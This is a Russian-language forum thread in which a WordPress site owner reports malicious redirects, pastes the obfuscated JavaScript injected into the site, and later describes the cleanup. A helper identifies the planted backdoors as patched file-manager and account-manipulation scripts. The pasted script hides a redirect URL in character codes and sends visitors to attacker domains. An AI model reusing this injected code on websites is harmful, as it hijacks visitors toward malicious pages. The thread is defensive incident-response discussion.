Редирект при открытии сайта Вирус?

[Redje]

Сайт на WP.
При попытке открыть сайт, происходит редирект сначала на

Код HTML:

https://trick.trainresistor.cc/come.php?id=76967-55-43567896-4

потом на

Код HTML:

https://fingerprintopuch.best/go/gzstiodbga5dkobsgy?subid3=plerk&=8&subid4=coffein

и вываливается кусок кода

Код:

	window.stop(); function _0x4165(_0x1c7833,_0x312763){var _0x384719=_0x3847();return _0x4165=function(_0x4165ff,_0x4cb21c){_0x4165ff=_0x4165ff-0x185;var _0x3edf04=_0x384719[_0x4165ff];return _0x3edf04;},_0x4165(_0x1c7833,_0x312763);}var _0x2ca8a2=_0x4165;(function(_0x538cc7,_0x2ae31a){var _0x173fc3=_0x4165,_0x5b6817=_0x538cc7();while(!![]){try{var _0x1b9268=parseInt(_0x173fc3(0x18e))/0x1+parseInt(_0x173fc3(0x191))/0x2*(parseInt(_0x173fc3(0x18d))/0x3)+parseInt(_0x173fc3(0x18f))/0x4+-parseInt(_0x173fc3(0x189))/0x5*(-parseInt(_0x173fc3(0x18c))/0x6)+-parseInt(_0x173fc3(0x186))/0x7+-parseInt(_0x173fc3(0x187))/0x8*(parseInt(_0x173fc3(0x18a))/0x9)+parseInt(_0x173fc3(0x18b))/0xa;if(_0x1b9268===_0x2ae31a)break;else _0x5b6817['push'](_0x5b6817['shift']());}catch(_0x1fc706){_0x5b6817['push'](_0x5b6817['shift']());}}}(_0x3847,0xe77a1));var ll=_0x2ca8a2(0x190);document[_0x2ca8a2(0x188)][_0x2ca8a2(0x185)]=ll,window[_0x2ca8a2(0x188)][_0x2ca8a2(0x192)](ll);function _0x3847(){var _0x786271=['688400bYXEDO','replace','href','5956636QUrnAb','47696JxEbld','location','296330XygErO','2358VtSkab','19357140uMcgeD','18tMFlRH','3cAvVrX','231172tCDMyi','2688948VEEIEX',String.fromCharCode(104,116,116,112,115,58,47,47,116,114,105,99,107,46,116,114,97,105,110,114,101,115,105,115,116,111,114,46,99,99,47,97,46,112,104,112,63,115,105,100,61,49,49,49,49,49,49,38,117,116,109,95,115,111,117,114,99,101,61,55,53,52,56,52,53)];_0x3847=function(){return _0x786271;};return _0x3847();}

Чем может быть вызвано?
Вирус?

Провекрка Aibolit ничего не дала.
А вот Eset 32 ругается при открытии сайта

[Aleksandra]

Сделайте полный бэкап сайта вместе с БД и ссылку мне в личку.

[Redje]

Сделайте полный бэкап сайта вместе с БД и ссылку мне в личку.

Добрый день.
Уже решил вопрос.
Спасибо!

[Aleksandra]

Каким образом?

[Redje]

Каким образом?

Установил примерную дату заражения. Посмотрел в какие файлы были внесены изменения с того момента. Установил ip злоумышленника, по логам посмотрел к каким файлам он обращался.
К сожалению, бэкапа предшествовавшего моменту заражения уже не было, поэтому восстановил сайт из бэкапа на момент, когда сайт еще открывался, но был уже заражен.
Закрыл доступ к сайту в htaccess. Удалил зараженные файлы. Удалил папки с шаблоном и плагинами по которым была зафиксирована активность злоумышленника.
Обновил сайт, заново установил шаблон и плагины, удалил учётные запись созданную злоумышленником, поменял пороли. Установил дополнительные плагины для повышения устойчивости сайта к взлому. В htaccess прописал директивы ограничивающие изменения в файлах только моим IP. Открыл доступ к сайту.
Пока рецидивов - нет.

[Aleksandra]

Удалил зараженные файлы.

Если у вас остались эти файлы, можете скинуть мне их в личку?

[Redje]

Если у вас остались эти файлы, можете скинуть мне их в личку?

Отправил ссылку в личку.
Если не затруднит поделитесь потом тем, что узнаете.
Чтобы хотя бы знать, что это и как называется )

[Aleksandra]

Отправил ссылку в личку.
Если не затруднит поделитесь потом тем, что узнаете.
Чтобы хотя бы знать, что это и как называется )

Хорошо, спасибо.

[Aleksandra]

Патченный https://github.com/prasathmani/tinyfilemanager/, а второй патченный https://gist.github.com/ilaraujo/e65...5a84a7c2bd9598

Один это полноценный файловый менеджер, другой в основном предназначен для манипуляции с аккаунтами WP.

Детект с комментариями на VT:

https://www.virustotal.com/gui/file/...bfa58748ae6efb
https://www.virustotal.com/gui/file/...362cba7ef76c8f

[Redje]

Патченный https://github.com/prasathmani/tinyfilemanager/, а второй патченный https://gist.github.com/ilaraujo/e65...5a84a7c2bd9598

Один это полноценный файловый менеджер, другой в основном предназначен для манипуляции с аккаунтами WP.

Детект с комментариями на VT:

https://www.virustotal.com/gui/file/...bfa58748ae6efb
https://www.virustotal.com/gui/file/...362cba7ef76c8f

Спасибо!
Весьма познавательно.

Хотелось бы еще уточнить, а код который вываливался после редиректа, который был внедрен на сайт, что из себя представляет. Он в первом посте.
Т.е. какова была цель злоумышленника?